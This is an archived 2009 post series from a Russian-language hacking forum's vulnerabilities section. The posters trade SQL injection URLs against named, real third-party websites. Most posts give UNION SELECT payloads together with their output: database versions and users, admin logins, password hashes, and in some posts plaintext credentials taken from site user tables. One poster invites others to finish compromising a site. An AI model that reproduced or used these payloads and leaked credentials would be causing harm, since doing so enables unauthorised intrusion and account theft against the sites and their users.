ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8761  
Старый 08.04.2009, 17:55
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Цитата:
http://rock.rachelbartonpine.com/rec_cd.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
Database Version: 4.1.21-log
Database name: bartonpine2
User name: bartonpine2@localhost


Цитата:
http://www.lokas-ltd.ru/?mod=pr&cat=1&sub=13&id=-1+union+select+1,2,3,4,5,6,7,8.9,10,11,12,13--
Database Version: 5.0.51a-community
Database name: db_lokasltd
User name: okasltd@localhost

Login: admin
Pass: ebd4c4b49a5e8a06d560cf12b0b83407 : ???



Цитата:
http://www.socratiparadoxo.co.za/browser.php?id=-2+union+select+1,2--
Database Version: 5.0.70-log
Database name: www_socratiparadoxo_co_za
User name: socratiparadoxo@localhost


Цитата:
http://www.imcafs.org/coastsheds/index.php?id=-5+union+select+1,2,3,4,6,6,7,8,9--
Database Version: 4.1.22
Database name: imcafs
User name: root@winooski.crc.uri.edu

Login: root
Pass: 18d08208054a0a43 : ???


FILE_PRIV: Y


Цитата:
http://thepro.ph/index.php?vw=news&id=-1+union+select+1,2,3,4--
Database Version: 5.0.67-community-log
Database name: theproph_thepro
User name: theproph_root@localhost

Последний раз редактировалось .:[melkiy]:.; 08.04.2009 в 18:01..
 
Ответить с цитированием

  #8762  
Старый 08.04.2009, 18:33
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Цитата:
http://www.visiteabahia.com.br/visite/destinos/costadodende/detalhes.php?id=34443327986557+union+select+1,2,co ncat_ws(0x3a,version(),user(),database()),4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19--


Version:5.0.67-community
User: visite_visite@localhost
Database: visite_v1





Цитата:
http://www.djmag.com.br/d.php?id=5587698380987+union+select+1,2,3,4,concat _ws(0x3a,version(),user(),database())--


Version:5.0.51-locaweb-log
User: djmag1@200.234.200.155
Database: djmag1





Цитата:
http://www.editoraideal.com.br/chico_ler_orientacoes.php?id=3333444777766544+unio n+select+1,concat_ws(0x3a,version(),user(),databas e()),3,4,5,6--



Version:5.1.30-community
User: editoraideal2@hm273.locaweb.com.br
Database: editoraideal2





Цитата:
http://www.internetsul.org.br/2008/noticias_detalhes.php?id=366655544433379877+union+ select+1,2,concat_ws(0x3a,version(),user(),databas e()),4,5--



Version:5.0.45
User: internetsul@localhost
Database: internetsul




Цитата:
http://www.daggerbmx.com.br/site/index.php?pagina=galeria&id_galeria=4687687651+uni on+select+1,concat_ws(0x3a,version(),user(),databa se()),3,4,5--&id_imagem=537



Version:5.0.54-log
User: daggerbmx@10.5.3.13
Database: daggerbmx




Цитата:
http://www.pedagogia.com.br/atividade.php?id=5576589769843237+union+select+1,2 ,concat_ws(0x3a,version(),user(),database())--



Version:5.0.51-locaweb-log
User: sobiologia1@200.234.200.88
Database: sobiologia1





Цитата:
http://www.nafigueredo.com.br/cds_int.php?id=5368769870987+union+select+1,2,3,4, 5,concat_ws(0x3a,version(),user(),database()),7,8, 9,10,11,12,13,14,15--



Version:5.0.51a-community
User: n10069_uses@localhost
Database: n10069_uses






Цитата:
http://www.msevangelico.com.br/estudo.php?ID=8098097378098098+union+select+1,2,co ncat_ws(0x3a,version(),user(),database()),4,5,6,7, 8--



Version:5.0.67-community
User: msevange_msevang@localhost
Database: msevange_msevangelico






Цитата:
http://www.pesca.com.br/jan_noticias.php?ID=8098098369879877+union+select+ 1,2,3,4,5,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Vers ion(),0x3a,Database(),0x3a,User(),0x3a),0x71),0x71 ),7--




Version:4.1.18-nt-log
Database: pesca
User: sysdba@localhost





Цитата:
http://www.miltonschaefer.com.br/web/ficha.php?id=89097380980987+union+select+1,2,3,4,5 ,concat_ws(0x3a,version(),user(),database()),7,8--




Version:5.0.67-community
User: mschae_root@localhost
Database: mschae_www





Цитата:
http://www.farmaco.ufsc.br/ppgf/view_disc.php?id=66565437987+union+select+concat_w s(0x3a,version(),user(),database()),2,3,4,5,6--



Version: 5.0.45-Max
User: farmaco@localhost
Database: farmaco
 
Ответить с цитированием

  #8763  
Старый 08.04.2009, 19:47
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Цитата:
http://www.romnews.com/community/modules.php?op=modload&name=Reviews&file=index&req =showcontent&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
Database Version: 4.0.25-Max-log
Database name: d0056ace
User name: d0056ace@localhost


Цитата:
http://2pb.co.uk/barristers.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
Database Version: 5.0.67
Database name: 2pb_co_uk_-_2pb
User name: admin2pb@localhost
 
Ответить с цитированием

  #8764  
Старый 08.04.2009, 21:43
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию

http://www.swlife.nnov.ru/clients/assortment/72/7399%09union%09select%09version()--

Version 5.0.51a
Есть таблицы swl_users там юзеры сайта но админка похоже не Хтакцессе


Создалели выше указанного сайта
http://www.r52.ru/index.phtml?rid=1&fid=6&sid=13&nid=38911+union+sel ect+1,version(),3,4,5,6,7,8,9,10,11,12,13--

Version 5.0.51a
также по хтакцессу похоже
Тиц 3900
если кто-то добьёт то напишите плиз в ЛС
 
Ответить с цитированием

  #8765  
Старый 08.04.2009, 23:07
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

http://www.medicalcare.ru/see.php?id=6+UNION+SELECT+1,2,3,4+LIMIT+1,1/*

Database Version: 4.1.22-lk-log
Database name: medcareru
User name: medcareru@localhost

http://www.laverminepersistante.net/public/see.php?id=0000000012+UNION+SELECT+1,2,3+LIMIT+1,1/*

Database Version: 4.1.15-Debian_0.dotdeb.4
Database name: vermine
User name: vermine@nshweb4

Последний раз редактировалось Rubaka; 08.04.2009 в 23:38.. Причина: добавил
 
Ответить с цитированием

  #8766  
Старый 09.04.2009, 09:51
edichka
Новичок
Регистрация: 31.01.2009
Сообщений: 22
Провел на форуме:
451572

Репутация: 34
По умолчанию

Axodiet.com pr 5

Код:
http://www.axodiet.com/eng/boutique/fiche.php?id=-30%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,group_concat(database(),0x23,user(),0x23,version()),3,4,5,6,7,8,9,0

axodiet#root@localhost#5.0.51a-3ubuntu5.1

http://www.axodiet.com/admin

login,pass: axodietit : peadmin

Достаем пароли от Бд

http://www.axodiet.com/eng/boutique/fiche.php?id=-30%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,group_concat(user,0x23,password),3,4,5,6,7,8,9,0%20from%20mysql.user

root *0A624058DAFE7EE13C6F2F64D22793924C063BB9
roundcube *3585AC10E7BD38043158417BB0EAE70734DEEF01
postfix *E4FC6FF842ADEFFC835A1078356EF98FD3D0C855
 
Ответить с цитированием

  #8767  
Старый 09.04.2009, 10:04
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
Отправить сообщение для DrAssault с помощью ICQ
По умолчанию

http://www.hestebasen.com/login/profile.php?id=-747+union+select+1,2,3,4,5,6,7,8,9,10,11,group_con cat(concat_ws(0x3a,username,password,email)+separa tor+0x0a),13,14+from+users/*

Последний раз редактировалось DrAssault; 09.04.2009 в 10:07..
 
Ответить с цитированием

  #8768  
Старый 09.04.2009, 15:18
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию

http://www.latela.ru/?page=news&newsid=2564567+union+select+1,2,version (),4,5,6--

version 5.0.67-log
Там 5 БД и все похоже какимто машинам посвящены...хотя сайт об одежде
Вообщем кому надо- крутите : )
 
Ответить с цитированием

  #8769  
Старый 09.04.2009, 15:46
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Цитата:
http://www.hempfiles.com/php/page.php?id=-5+UNION+SELECT+1,2,3,4,5,6,7--
Database Version: 5.0.32-Debian_7etch8-log
Database name: hempfiles
User name: hempfiles@localhost

administrator:ibn23jo
schorpioen:atreides
thesedrugs:th3s3drugs
rmontgomery:buydutchseeds
perfectpee:drugtest


Интересные таблицы: users, phpbb_users, phpads_clients
 
Ответить с цитированием

  #8770  
Старый 09.04.2009, 17:41
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

PR 3
Код:
http://www.thegreatnorthern.com/eat-drink.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9
dbu-greatnorth@localhost:db-greatnorthern:5.0.27-community-nt
Код:
http://www.thegreatnorthern.com/eat-drink.php?id=-1+union+select+1,2,3,4,5,6,7,8,9+from+tbl_administrator
Хз колумны.

PR 0
http://www.bardrinks.mobi/drink.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28/*

Последний раз редактировалось mailbrush; 09.04.2009 в 17:57..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ